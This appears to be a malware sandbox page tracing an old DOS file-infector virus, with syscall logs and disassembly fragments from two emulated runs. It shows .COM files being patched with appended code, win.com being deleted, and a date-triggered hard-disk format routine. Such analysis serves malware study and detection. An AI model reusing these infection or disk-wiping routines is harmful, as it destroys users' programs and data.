Sample viewer

vx.netlux.org/Virus.DOS.AntiWin_III.465

Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-17T22:46:49.287240677Z 26 PC: 147b3 | Set disk transfer address
2018-12-17T22:46:49.288897887Z 250 PC: 147bb | UNKNOWN!
2018-12-17T22:46:49.289672819Z 71 PC: 147c6 | Get current directory
2018-12-17T22:46:49.291619349Z 25 PC: 147ca | Get default drive
2018-12-17T22:46:49.293628259Z 78 PC: 147e2 | Find first file
2018-12-17T22:46:49.297405745Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.301412012Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.303001155Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.304837036Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.307309983Z 61 PC: 147f0 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:49.313793832Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.315316812Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.316952376Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.327215506Z 61 PC: 147f0 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:49.34976626Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.351063503Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.352679205Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.355211901Z 61 PC: 147f0 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:49.366302613Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.368312774Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.370537927Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.372849452Z 61 PC: 147f0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:49.379086275Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.380873333Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.382462741Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.384716531Z 61 PC: 147f0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:49.391827979Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.393120989Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.394729669Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.397967945Z 61 PC: 147f0 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:49.404374575Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.406054094Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.410062723Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.412701098Z 61 PC: 147f0 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:49.419387904Z 66 PC: 14803 | Move file pointer
2018-12-17T22:46:49.421402207Z 66 PC: 14824 | Move file pointer
2018-12-17T22:46:49.422968899Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:49.429451913Z 62 PC: 148d3 | Close file
2018-12-17T22:46:49.439516832Z 79 PC: 148db | Find next file
2018-12-17T22:46:49.441978829Z 59 PC: 148f7 | Change current directory
2018-12-17T22:46:49.446766292Z 62 PC: 148b0 | Close file
2018-12-17T22:46:49.44877481Z 26 PC: 148b7 | Set disk transfer address
2018-12-17T22:46:49.450050498Z 59 PC: 148bf | Change current directory
2018-12-17T22:46:49.454009266Z 26 PC: 145e2 | Set disk transfer address
2018-12-17T22:46:49.455894659Z 71 PC: 14682 | Get current directory
2018-12-17T22:46:49.45858757Z 78 PC: 145f1 | Find first file
2018-12-17T22:46:49.465080382Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.472719378Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:46:49.479365765Z 66 PC: 14630 | Move file pointer
2018-12-17T22:46:49.48098069Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:46:49.484492379Z 66 PC: 14648 | Move file pointer
2018-12-17T22:46:49.486009944Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-17T22:46:49.499105675Z 62 PC: 14659 | Close file
2018-12-17T22:46:49.50753481Z 59 PC: 14661 | Change current directory
2018-12-17T22:46:49.511604887Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-17T22:46:49.859525379Z 59 PC: 1466e | Change current directory
2018-12-17T22:46:49.861908453Z 26 PC: 14677 | Set disk transfer address
2018-12-17T22:46:49.862933715Z 71 PC: 1441e | Get current directory
2018-12-17T22:46:49.864991934Z 26 PC: 1443d | Set disk transfer address
2018-12-17T22:46:49.866566747Z 78 PC: 14447 | Find first file
2018-12-17T22:46:49.870297424Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.874313987Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:49.880519644Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.887149755Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:46:49.888833266Z 66 PC: 1448b | Move file pointer
2018-12-17T22:46:49.8903706Z 44 PC: 14491 | Get time
    0x14491: inc dl
    0x14493: mov byte ptr [bp + 0x2d9], dl
    0x14497: pushaw
    0x14498: call 0x243f2
    0x1449b: popaw
    0x1449c: mov byte ptr [bp + 0x330], 0xe9
    0x144a1: mov ax, word ptr [bp + 0x34e]
    0x144a5: sub ax, 3
    0x144a8: mov word ptr [bp + 0x331], ax
    0x144ac: mov word ptr [bp + 0x333], 0x60
    0x144b2: mov ah, 0x40
    0x144b4: mov cx, 4
    0x144b7: lea dx, word ptr [bp + 0x330]
    0x144bb: int 0x21
    0x144bd: mov ax, 0x4202
    0x144c0: xor cx, cx
    0x144c2: xor dx, dx
    0x144c4: int 0x21
    0x144c6: mov ah, 0x40
    0x144c8: mov cx, 0x1d6
2018-12-17T22:46:49.892712595Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:49.895355945Z 66 PC: 144c6 | Move file pointer
2018-12-17T22:46:49.897241872Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-17T22:46:49.905199072Z 42 PC: 144da | Get date
    0x144da: cmp dx, 0x71a
    0x144de: je 0x1453f
    0x144e0: cmp dx, 0xc06
    0x144e4: je 0x1453f
    0x144e6: lea dx, word ptr [bp + 0x29f]
    0x144ea: mov ah, 0x3b
    0x144ec: int 0x21
    0x144ee: jb 0x144f3
    0x144f0: jmp 0x1443d
    0x144f3: mov ax, 0x5701
    0x144f6: mov dx, word ptr [bp + 0x326]
    0x144fa: mov cx, word ptr [bp + 0x324]
    0x144fe: int 0x21
    0x14500: mov ah, 0x3e
    0x14502: int 0x21
    0x14504: mov ax, 0x4301
    0x14507: lea dx, word ptr [bp + 0x352]
    0x1450b: xor ch, ch
    0x1450d: mov cl, byte ptr [bp + 0x323]
    0x14511: int 0x21
2018-12-17T22:46:49.906696857Z 59 PC: 144ee | Change current directory
2018-12-17T22:46:49.910317666Z 87 PC: 14500 | Get or set file date and time
2018-12-17T22:46:49.911860374Z 62 PC: 14504 | Close file
2018-12-17T22:46:49.919513745Z 67 PC: 14513 | Get or set file attributes
2018-12-17T22:46:49.941219769Z 59 PC: 1451b | Change current directory
2018-12-17T22:46:49.944836076Z 26 PC: 14527 | Set disk transfer address
2018-12-17T22:46:49.946183836Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:46:49.950951254Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:46:49.952202349Z 26 PC: 14274 | Set disk transfer address
2018-12-17T22:46:49.953289269Z 71 PC: 14281 | Get current directory
2018-12-17T22:46:49.957963442Z 42 PC: 14286 | Get date
    0x14286: cmp dl, 6
    0x14289: jne 0x142ad
    0x1428b: mov ax, 0x500
    0x1428e: mov cx, 0
    0x14291: mov dh, 0
    0x14293: mov dl, 0x80
    0x14295: int 0x13
    0x14297: jb 0x1425a
    0x14299: mov ah, 9
    0x1429b: lea dx, word ptr [si + 0x27d]
    0x1429f: int 0x21
    0x142a1: nop
    0x142a2: jmp 0x142a1
    0x142a4: mov cx, 0x4eb
    0x142a7: jmp 0x142a5
    0x142a9: cli
    0x142aa: jmp 0x142a0
    0x142ac: iret
    0x142ad: lea dx, word ptr [si + 0x25c]
    0x142b1: xor cx, cx
2018-12-17T22:46:49.960371358Z 78 PC: 142b7 | Find first file
2018-12-17T22:46:49.966392581Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:49.973294386Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:46:49.9769879Z 87 PC: 142ec | Get or set file date and time
2018-12-17T22:46:49.97867614Z 66 PC: 142fc | Move file pointer
2018-12-17T22:46:49.980292839Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-17T22:46:49.988095717Z 44 PC: 1430f | Get time
    0x1430f: or dx, dx
    0x14311: je 0x1430b
    0x14313: mov word ptr [si + 0x2df], dx
    0x14317: xor dx, dx
    0x14319: xor cx, cx
    0x1431b: mov ax, 0x4202
    0x1431e: int 0x21
    0x14320: or dx, dx
    0x14322: jne 0x142d6
    0x14324: cmp ah, 0xfe
    0x14327: jae 0x142d6
    0x14329: call 0x24240
    0x1432c: mov ax, 0x4200
    0x1432f: xor cx, cx
    0x14331: mov dx, 1
    0x14334: int 0x21
    0x14336: mov ah, 0x40
    0x14338: lea dx, word ptr [si + 0x2e4]
    0x1433c: mov cx, 2
    0x1433f: int 0x21
2018-12-17T22:46:49.990506999Z 66 PC: 14320 | Move file pointer
2018-12-17T22:46:49.992364673Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-17T22:46:50.002950667Z 66 PC: 14336 | Move file pointer
2018-12-17T22:46:50.004178427Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-17T22:46:50.006799636Z 87 PC: 14348 | Get or set file date and time
2018-12-17T22:46:50.00895229Z 62 PC: 1434c | Close file
2018-12-17T22:46:50.017821758Z 59 PC: 14354 | Change current directory
2018-12-17T22:46:50.019623159Z 26 PC: 1435b | Set disk transfer address
2018-12-17T22:46:50.022948748Z 48 PC: 1404a | Get DOS version
2018-12-17T22:46:50.02452451Z 47 PC: 14056 | Get disk transfer address
2018-12-17T22:46:50.026074358Z 26 PC: 14063 | Set disk transfer address
2018-12-17T22:46:50.027790481Z 78 PC: 140d6 | Find first file
2018-12-17T22:46:50.033633796Z 67 PC: 1411a | Get or set file attributes
2018-12-17T22:46:50.039050713Z 67 PC: 14128 | Get or set file attributes
2018-12-17T22:46:50.050191422Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:50.056717061Z 87 PC: 1413c | Get or set file date and time
2018-12-17T22:46:50.058087336Z 44 PC: 14146 | Get time
    0x14146: mov ah, 0x3f
    0x14148: mov cx, 3
    0x1414b: lea dx, word ptr [si + 0x13]
    0x1414e: int 0x21
    0x14150: jb 0x14199
    0x14152: cmp ax, 3
    0x14155: jne 0x14199
    0x14157: mov ax, 0x4202
    0x1415a: xor cx, cx
    0x1415c: xor dx, dx
    0x1415e: int 0x21
    0x14160: jb 0x14199
    0x14162: mov cx, ax
    0x14164: sub ax, 3
    0x14167: mov word ptr [si + 0x17], ax
    0x1416a: add cx, 0x2bd
    0x1416e: mov word ptr [si - 0x1bc], cx
    0x14172: mov ah, 0x40
    0x14174: mov cx, 0x1e1
    0x14177: nop
2018-12-17T22:46:50.060898751Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:46:50.0633911Z 66 PC: 14160 | Move file pointer
2018-12-17T22:46:50.064797012Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.073750807Z 66 PC: 1418d | Move file pointer
2018-12-17T22:46:50.075368705Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-17T22:46:50.078377135Z 87 PC: 141aa | Get or set file date and time
2018-12-17T22:46:50.080676055Z 62 PC: 141ae | Close file
2018-12-17T22:46:50.090683726Z 67 PC: 141b9 | Get or set file attributes
2018-12-17T22:46:50.414288343Z 26 PC: 141c4 | Set disk transfer address
2018-12-17T22:46:50.416099482Z 26 PC: 13e67 | Set disk transfer address
2018-12-17T22:46:50.417316849Z 78 PC: 13ea5 | Find first file
2018-12-17T22:46:50.423136098Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:50.430272238Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.432816758Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.434093832Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.43811946Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.446117669Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.447384825Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.450341616Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.458666715Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.461819999Z 61 PC: 13eb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:50.469585841Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.476396178Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.477970066Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.480890519Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.484029387Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.485352216Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.488321377Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.495695855Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.498165376Z 61 PC: 13eb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:50.504917875Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.511005381Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.512251659Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.515384198Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.523221287Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.524540845Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.531731917Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.539615174Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.542146875Z 61 PC: 13eb1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:50.548851969Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.555233459Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.556586429Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.559500902Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.56826659Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.569691992Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.57650095Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.584432071Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.586793805Z 61 PC: 13eb1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:50.594651261Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.603391164Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.605090461Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.609092779Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.617674929Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.619328517Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.626512863Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.635351175Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.637791768Z 61 PC: 13eb1 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:50.644835659Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.651154469Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.652430326Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.655990587Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.66446624Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.665788278Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.672754148Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.680912567Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.683389477Z 61 PC: 13eb1 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:50.690354516Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.696703374Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.698052638Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.701350242Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.70904676Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.710310209Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.717325891Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.725159659Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.728279712Z 61 PC: 13eb1 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:50.734747876Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-17T22:46:50.737176197Z 66 PC: 13ed9 | Move file pointer
2018-12-17T22:46:50.738421022Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.746056368Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-17T22:46:50.756672625Z 66 PC: 13f02 | Move file pointer
2018-12-17T22:46:50.758022529Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-17T22:46:50.760967475Z 62 PC: 13e99 | Close file
2018-12-17T22:46:50.768691982Z 79 PC: 13ea5 | Find next file
2018-12-17T22:46:50.771002745Z 26 PC: 13e7b | Set disk transfer address
2018-12-17T22:46:50.772131813Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:46:50.77722225Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T12:22:18.446868629Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:18.448743289Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:18.450846472Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:18.455081475Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:18.457735868Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:18.464286394Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.47138355Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:18.472967063Z 62 PC: 148d3 | Close file
2018-12-25T12:22:18.476528628Z 79 PC: 148db | Find next file
2018-12-25T12:22:18.479623663Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.487647687Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.49008645Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.492462025Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.495688051Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.509870884Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.512296931Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.514136222Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.517703045Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.525181537Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.527090604Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.53053151Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.539985205Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.54782666Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.550102728Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.552781204Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.556233328Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.564804569Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.56688387Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.568870891Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.572377289Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.580096022Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.582396486Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.584462835Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.589080326Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:18.596640781Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:18.59854521Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:18.601600524Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:18.608910411Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.610773551Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.614110172Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:18.618818077Z 62 PC: 148b0 | Close file
2018-12-25T12:22:18.620534477Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:18.622469064Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:18.626515892Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:18.627727073Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:18.630590929Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:18.634495188Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.642320036Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:18.647404729Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:18.649304563Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:18.652162423Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:18.654190588Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:18.668777462Z 62 PC: 14659 | Close file
2018-12-25T12:22:18.677437984Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:18.681932286Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.023004062Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.02552902Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.027321352Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.031573059Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.033339724Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.040116981Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.053187665Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.061167854Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.069211824Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.072035723Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.074133248Z 44 PC: 14491 | Get time
    0x14491: inc dl
    0x14493: mov byte ptr [bp + 0x2d9], dl
    0x14497: pushaw
    0x14498: call 0x243f2
    0x1449b: popaw
    0x1449c: mov byte ptr [bp + 0x330], 0xe9
    0x144a1: mov ax, word ptr [bp + 0x34e]
    0x144a5: sub ax, 3
    0x144a8: mov word ptr [bp + 0x331], ax
    0x144ac: mov word ptr [bp + 0x333], 0x60
    0x144b2: mov ah, 0x40
    0x144b4: mov cx, 4
    0x144b7: lea dx, word ptr [bp + 0x330]
    0x144bb: int 0x21
    0x144bd: mov ax, 0x4202
    0x144c0: xor cx, cx
    0x144c2: xor dx, dx
    0x144c4: int 0x21
    0x144c6: mov ah, 0x40
    0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.076584769Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.079610879Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.082976154Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:19.387805516Z 42 PC: 144da | Get date
    0x144da: cmp dx, 0x71a
    0x144de: je 0x1453f
    0x144e0: cmp dx, 0xc06
    0x144e4: je 0x1453f
    0x144e6: lea dx, word ptr [bp + 0x29f]
    0x144ea: mov ah, 0x3b
    0x144ec: int 0x21
    0x144ee: jb 0x144f3
    0x144f0: jmp 0x1443d
    0x144f3: mov ax, 0x5701
    0x144f6: mov dx, word ptr [bp + 0x326]
    0x144fa: mov cx, word ptr [bp + 0x324]
    0x144fe: int 0x21
    0x14500: mov ah, 0x3e
    0x14502: int 0x21
    0x14504: mov ax, 0x4301
    0x14507: lea dx, word ptr [bp + 0x352]
    0x1450b: xor ch, ch
    0x1450d: mov cl, byte ptr [bp + 0x323]
    0x14511: int 0x21
2018-12-25T12:22:19.391008212Z 59 PC: 144ee | Change current directory
2018-12-25T12:22:19.404881292Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:19.407745196Z 62 PC: 14504 | Close file
2018-12-25T12:22:19.417631292Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:19.430589794Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:19.434691483Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:19.436120796Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:19.440297446Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:19.443825796Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:19.445541621Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:19.450637799Z 42 PC: 14286 | Get date
    0x14286: cmp dl, 6
    0x14289: jne 0x142ad
    0x1428b: mov ax, 0x500
    0x1428e: mov cx, 0
    0x14291: mov dh, 0
    0x14293: mov dl, 0x80
    0x14295: int 0x13
    0x14297: jb 0x1425a
    0x14299: mov ah, 9
    0x1429b: lea dx, word ptr [si + 0x27d]
    0x1429f: int 0x21
    0x142a1: nop
    0x142a2: jmp 0x142a1
    0x142a4: mov cx, 0x4eb
    0x142a7: jmp 0x142a5
    0x142a9: cli
    0x142aa: jmp 0x142a0
    0x142ac: iret
    0x142ad: lea dx, word ptr [si + 0x25c]
    0x142b1: xor cx, cx
2018-12-25T12:22:19.454938908Z 78 PC: 142b7 | Find first file
2018-12-25T12:22:19.463065043Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.470571446Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.475060952Z 87 PC: 142ec | Get or set file date and time
2018-12-25T12:22:19.476631083Z 66 PC: 142fc | Move file pointer
2018-12-25T12:22:19.478232336Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-25T12:22:19.487617721Z 44 PC: 1430f | Get time
    0x1430f: or dx, dx
    0x14311: je 0x1430b
    0x14313: mov word ptr [si + 0x2df], dx
    0x14317: xor dx, dx
    0x14319: xor cx, cx
    0x1431b: mov ax, 0x4202
    0x1431e: int 0x21
    0x14320: or dx, dx
    0x14322: jne 0x142d6
    0x14324: cmp ah, 0xfe
    0x14327: jae 0x142d6
    0x14329: call 0x24240
    0x1432c: mov ax, 0x4200
    0x1432f: xor cx, cx
    0x14331: mov dx, 1
    0x14334: int 0x21
    0x14336: mov ah, 0x40
    0x14338: lea dx, word ptr [si + 0x2e4]
    0x1433c: mov cx, 2
    0x1433f: int 0x21
2018-12-25T12:22:19.490184511Z 66 PC: 14320 | Move file pointer
2018-12-25T12:22:19.492084197Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-25T12:22:19.65694466Z 66 PC: 14336 | Move file pointer
2018-12-25T12:22:19.659238578Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-25T12:22:19.662716541Z 87 PC: 14348 | Get or set file date and time
2018-12-25T12:22:19.665149018Z 62 PC: 1434c | Close file
2018-12-25T12:22:19.765923329Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:19.768427925Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:19.770424558Z 48 PC: 1404a | Get DOS version
